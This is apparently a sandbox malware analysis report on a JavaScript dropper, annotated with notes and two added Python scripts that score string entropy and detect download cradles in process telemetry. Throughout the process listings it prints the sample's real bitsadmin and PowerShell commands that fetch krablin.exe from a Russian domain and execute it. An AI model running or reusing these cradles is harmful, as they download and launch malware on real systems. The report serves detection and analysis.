
Analysis Report 11Love_You_2019_35210544-txt.js

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 102817
Start date: 11.01.2019
Start time: 20:05:49
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 21s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 11Love_You_2019_35210544-txt.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (Javascript)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.evad.winJS@11/5@1/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, svchost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy: Threshold
Score: 76
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

None of the HTTP servers the sample contacted answered: slpsrgpsrhojifdij.ru resolved to 92.63.197.48 and a TCP connection to port 80 was attempted, but no payload was retrieved and neither dropped .exe appears among the started processes. Likely the sample is an old dropper whose download host no longer serves the payload.
Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.
Sample tries to load a library which is not present on the analysis machine; adding the library might reveal more behavior. The only missing library reported below is wow64log.dll, which every 32-bit process on 64-bit Windows tries to load and which is absent on a default install, so this advice is unlikely to apply here.



Mitre Att&ck Matrix

Techniques are listed by tactic column. The bracketed number after a technique is the matrix's signature-count badge (the digits were run together with the technique name by extraction and are kept as shown); techniques without a number are the matrix's unmatched placeholders.

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Command-Line Interface [1]; PowerShell [5]; Scripting [51]; Scheduled Task; Command-Line Interface
Persistence: BITS Jobs [1]; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification
Privilege Escalation: Process Injection [11]; Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness
Defense Evasion: Disabling Security Tools [1]; BITS Jobs [1]; Process Injection [11]; Scripting [51]; Obfuscated Files or Information [1]
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation
Discovery: Process Discovery [1]; Security Software Discovery [111]; Remote System Discovery [1]; System Information Discovery [1]; Remote System Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer
Command and Control: Standard Non-Application Layer Protocol [1]; Standard Application Layer Protocol [1]; Custom Cryptographic Protocol; Multiband Communication; Standard Cryptographic Protocol

Signature Overview



Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream
  • Source: 11Love_You_2019_35210544-txt.js | Argument value: ['"cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(\'http:']

Networking:

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
  • Source: 11Love_You_2019_35210544-txt.js | Argument value: ['"cmd.exe /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/kr']
  • Source: 11Love_You_2019_35210544-txt.js | Argument value: ['"cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile(\'http:']
Connects to country known for bullet proof hosters
  • Source: unknown | Network traffic detected: IP: 92.63.197.48 Russian Federation
IP address seen in connection with other malware
  • Source: Joe Sandbox View | IP Address: 92.63.197.48
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
  • Source: global traffic | TCP traffic: 192.168.2.5:49794 -> 92.63.197.48:80
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: slpsrgpsrhojifdij.ru
Urls found in memory or binary data
  • Source: powershell.exe, 00000009.00000002.4649132209.0000000002A2A000.00000004.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
  • Source: powershell.exe, 00000009.00000003.4640479844.0000000006D44000.00000004.sdmp | String found in binary or memory: http://crl.microsof
  • Source: powershell.exe, 00000009.00000003.4628787221.0000000006CEC000.00000004.sdmp | String found in binary or memory: http://crl.microsoft.co
  • Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
  • Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
  • Source: powershell.exe, 00000009.00000002.4650783353.00000000043E0000.00000004.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  • Source: powershell.exe, 00000009.00000003.4619266330.0000000004E74000.00000004.sdmp | String found in binary or memory: http://slpsrgpsrhojifdij.ru
  • Source: PowerShell_transcript.358075.TAzTFvVy.20190111200651.txt.9.dr | String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe
  • Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
  • Source: powershell.exe, 00000009.00000003.4640261841.0000000006D0A000.00000004.sdmp | String found in binary or memory: http://www.microsoft.coU
  • Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmp | String found in binary or memory: https://contoso.com/
  • Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmp | String found in binary or memory: https://contoso.com/Icon
  • Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmp | String found in binary or memory: https://contoso.com/License
  • Source: powershell.exe, 00000009.00000002.4653094757.000000000451F000.00000004.sdmp | String found in binary or memory: https://github.com/Pester/Pester
  • Source: powershell.exe, 00000009.00000002.4678066705.0000000005409000.00000004.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Only the slpsrgpsrhojifdij.ru entries relate to the sample. The Pester, NuGet, contoso.com and xmlsoap.org strings are module manifest and schema text that any powershell.exe process carries in memory, and the crl.* URLs are certificate revocation endpoints touched during signature checks; none of them are indicators.

System Summary:

Powershell connects to network
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Network Connect: 92.63.197.48 80
Wscript starts Powershell (via cmd or directly)
  • Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Creates mutexes
  • Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4356:120:WilError_01
  • Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
JavaScript / VBScript file with very long strings (likely obfuscated code)
  • Source: 11Love_You_2019_35210544-txt.js | Initial sample: strings found that are longer than 50 characters
Reads the hosts file
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Tries to load missing DLLs
  • Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64log.dll
  • Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wow64log.dll (2 occurrences)
  • Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wow64log.dll
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64log.dll
  wow64log.dll is requested by the WOW64 layer in every 32-bit process on 64-bit Windows and is absent by default; the sample runs 32-bit because it was launched from the SysWOW64 script host, so this is not sample behaviour.
Classification label
  • Source: classification engine | Classification label: mal76.evad.winJS@11/5@1/1
Creates files inside the user directory
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20190111
  This is the date-named output directory of PowerShell transcription logging, which the analysis system has enabled (the transcript PowerShell_transcript.358075.TAzTFvVy.20190111200651.txt quoted above comes from it), not a directory chosen by the sample.
Creates temporary files
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoulwcom.qry.ps1
  The __PSScriptPolicyTest_*.ps1 file is written by powershell.exe at startup to probe the AppLocker / code-integrity policy and decide its language mode; it appears in every PowerShell launch.
Parts of this application use the .NET runtime (probably coded in C#)
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
  powershell.exe is itself a .NET host, so this says nothing about the sample.
Reads ini files
  • Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
  • Source: C:\Windows\SysWOW64\wscript.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
  This is the Software Restriction Policies (SAFER) check the script host performs before running a script.
Spawns processes
  • Source: unknown | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\11Love_You_2019_35210544-txt.js'
  • Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
  • Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: unknown | Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
  • Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  Neither 495958594939.exe nor 979574639568794.exe appears as a created process: the download never completed, so the payload stage was not observed.
Uses an in-process (OLE) Automation server
  • Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
  {f414c260-6ac0-11cf-b6d1-00aa00bbbb58} is the JScript language engine, which wscript.exe loads to run any .js file.
Found graphical window changes (likely an installer)
  • Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
  mscorrc.dll is the .NET Framework runtime resource library, not a Silverlight component; this signature is a false positive.

Data Obfuscation:

Powershell starts a process from the temp directory
  • Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Suspicious powershell command line found
  • Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
  • Source: 11Love_You_2019_35210544-txt.js | String: entropy: 5.32, length: 211, content: "cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http:
  The flagged string is the plaintext PowerShell download command, not encoded data; an entropy of 5.32 bits per character is normal for a long mixed-case command line with punctuation, so this signature is a triage heuristic rather than evidence of obfuscation.
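The two string signatures above (literals longer than 50 characters, and long literals with high entropy) are cheap static heuristics. The script below, added here as an example and not Joe Sandbox's implementation, extracts JavaScript string literals, scores each one by length and Shannon entropy, and adds a keyword check for shell and download APIs so that a plaintext download cradle like this sample's is still flagged even where entropy alone would not separate it from ordinary text. The .js body, the thresholds and the keyword list are constructed assumptions.

```python
"""Length/entropy triage of JavaScript string literals.

Added example for this report, not Joe Sandbox code. SAMPLE_JS is a constructed
snippet modelled on the report's command line; thresholds are assumptions."""
import math
import re
from collections import Counter

# JS string literals, single- or double-quoted, keeping backslash escapes intact.
STRING_RE = re.compile(r'"((?:[^"\\\n]|\\.)*)"|\'((?:[^\'\\\n]|\\.)*)\'')
# Keywords that mark a literal as shell or download related regardless of entropy.
SHELL_RE = re.compile(
    r"wscript\.shell|cmd\.exe|powershell|bitsadmin|downloadfile|downloadstring", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character: 0.0 for one repeated symbol, log2(n) for n equiprobable ones."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def js_string_literals(src: str):
    """Return the bodies of all string literals in source order."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in STRING_RE.finditer(src)]


def triage(src: str, min_len: int = 50, min_entropy: float = 4.5):
    """Flag literals the way a sandbox string signature would, plus the keyword check."""
    findings = []
    for lit in js_string_literals(src):
        ent = shannon_entropy(lit)
        flags = []
        if len(lit) > min_len:
            flags.append("long")
            if ent >= min_entropy:
                flags.append("high_entropy")
        if SHELL_RE.search(lit):
            flags.append("shell_or_download")
        if flags:
            findings.append({"length": len(lit), "entropy": round(ent, 2),
                             "flags": flags, "preview": lit[:60]})
    return findings


# Constructed .js body (not the real sample) carrying the report's command line.
SAMPLE_JS = r'''
var sh = new ActiveXObject("WScript.Shell");
var greeting = "ok";
var cmd = "cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\\Users\\user\\AppData\\Local\\Temp\\979574639568794.exe');Start-Process 'C:\\Users\\user\\AppData\\Local\\Temp\\979574639568794.exe'";
sh.Run(cmd, 0, false);
'''

if __name__ == "__main__":
    for finding in triage(SAMPLE_JS):
        print(finding)
```

The short "WScript.Shell" literal is caught only by the keyword check, and the long command line is caught by length before its entropy is even considered; the entropy threshold matters for base64 or hex blobs, which this sample does not use.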

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
  • Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'
Tries to download files via bitsadmin
  • Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: unknown | Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe
  • Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe
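The two download-and-execute chains above are what a detection rule on process-creation telemetry should key on: a script host (wscript.exe) as ancestor, and a child command line carrying either the bitsadmin /transfer cradle or a WebClient.DownloadFile call with -ExecutionPolicy Bypass. The script below, added here as an example rather than Joe Sandbox's own logic, rebuilds the parent chain from Sysmon-style events, matches those cradles, and pulls out the URL, host and drop path as IOCs. The events are constructed from the report's "Process created" lines; the PIDs, the benign control event and the regexes are assumptions.

```python
"""Detect the wscript -> cmd -> {bitsadmin|powershell} download cradle and extract IOCs.

Added example for this report, not Joe Sandbox code. EVENTS is built from the report's
"Process created" lines with assumed PIDs, plus one benign PowerShell launch as a control."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


EVENTS = [
    ProcEvent(4100, 900, r"C:\Windows\SysWOW64\wscript.exe",
              r"'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\11Love_You_2019_35210544-txt.js'"),
    ProcEvent(4200, 4100, r"C:\Windows\SysWOW64\cmd.exe",
              r"'C:\Windows\System32\cmd.exe' /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe&start C:\Users\user\AppData\Local\Temp\495958594939.exe"),
    ProcEvent(4300, 4200, r"C:\Windows\SysWOW64\bitsadmin.exe",
              r"bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\user\AppData\Local\Temp\495958594939.exe"),
    ProcEvent(4400, 4100, r"C:\Windows\SysWOW64\cmd.exe",
              r"'C:\Windows\System32\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'"),
    ProcEvent(4500, 4400, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\user\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\979574639568794.exe'"),
    # Constructed benign control: an admin running PowerShell with no script-host ancestor.
    ProcEvent(4600, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Get-Service"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns for the two cradles seen in the report (assumed, not Joe's signatures).
CRADLES = {
    "bitsadmin_transfer": re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\b.*?/download\b", re.I),
    "powershell_webclient": re.compile(r"net\.webclient\)?\.(?:downloadfile|downloadstring)\(", re.I),
    "powershell_exec_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.I)
# Executables written under user-writable locations (drop paths), not system binaries.
DROP_RE = re.compile(r"[A-Za-z]:\\(?:Users|ProgramData|Windows\\Temp)\\[^\s'\"&;]+\.exe", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def lineage(ev: ProcEvent, by_pid: dict) -> list:
    """Image names from the oldest known ancestor down to ev; stops at unknown PIDs or loops."""
    chain, seen = [ev], {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return [image_name(e.image) for e in reversed(chain)]


def detect(events: list) -> list:
    """One hit per event whose command line matches a cradle, with its ancestry and IOCs."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        cradles = [name for name, rx in CRADLES.items() if rx.search(ev.cmdline)]
        if not cradles:
            continue
        chain = lineage(ev, by_pid)
        hits.append({
            "pid": ev.pid,
            "chain": " -> ".join(chain),
            "script_host_ancestor": any(a in SCRIPT_HOSTS for a in chain[:-1]),
            "cradles": cradles,
            "urls": sorted(set(URL_RE.findall(ev.cmdline))),
            "drop_paths": sorted(set(DROP_RE.findall(ev.cmdline))),
        })
    return hits


def collect_iocs(hits: list) -> dict:
    """Deduplicated URLs, hosts and drop paths across all hits."""
    urls = sorted({u for h in hits for u in h["urls"]})
    hosts = sorted({u.split("://", 1)[1].split("/", 1)[0].lower() for u in urls})
    drops = sorted({p for h in hits for p in h["drop_paths"]})
    return {"urls": urls, "hosts": hosts, "drop_paths": drops}


if __name__ == "__main__":
    found = detect(EVENTS)
    for h in found:
        print(h["chain"], h["cradles"], h["urls"], h["drop_paths"])
    print(collect_iocs(found))
```

The script-host ancestor flag is what separates this chain from an administrator typing the same cmdlets; the control event with no cradle in its command line produces no hit at all, and a PowerShell download launched directly from a console would hit the cradle patterns but carry script_host_ancestor = False, which is where a rule would lower its severity rather than suppress it.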

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
  • Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
  • Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (119 occurrences)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported twice)
  Note: 922337203685477 is 0x8000000000000000 (the NtDelayExecution interval that SleepEx uses for INFINITE) converted from 100 ns units to milliseconds, so this is an unbounded wait rather than a delay the script computed.
Found WSH timer for Javascript or VBS script (likely evasive script)
  Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
  Note: wscript.exe creates this hidden timer window for WScript.Sleep(), so the script itself sleeps before or between its actions.
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5726
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1220
May sleep (evasive loops) to hinder dynamic analysis
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664 | Thread sleep count: 5726 > 30
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664 | Thread sleep count: 1220 > 30
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1148 | Thread sleep time: -922337203685477s >= -30000s
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620 | Thread sleep count: 107 > 30
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1268 | Thread sleep time: -30000s >= -30000s
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 272 | Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
  Source: powershell.exe, 00000009.00000002.4671583242.0000000004C02000.00000004.sdmp | Binary or memory string: Hyper-V
  Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
  Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
  Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
  Source: powershell.exe, 00000009.00000002.4671583242.0000000004C02000.00000004.sdmp | Binary or memory string: Xk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
  Source: powershell.exe, 00000009.00000003.4640141186.0000000006CEE000.00000004.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
  Source: powershell.exe, 00000009.00000002.4693954182.0000000007030000.00000002.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
  Note: these strings are the Hyper-V PowerShell module path, Windows Host Compute Service error messages and a Winsock provider name that are present in any powershell.exe process; they are not evidence that the script performed a VM check.
Queries a list of all running processes
  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

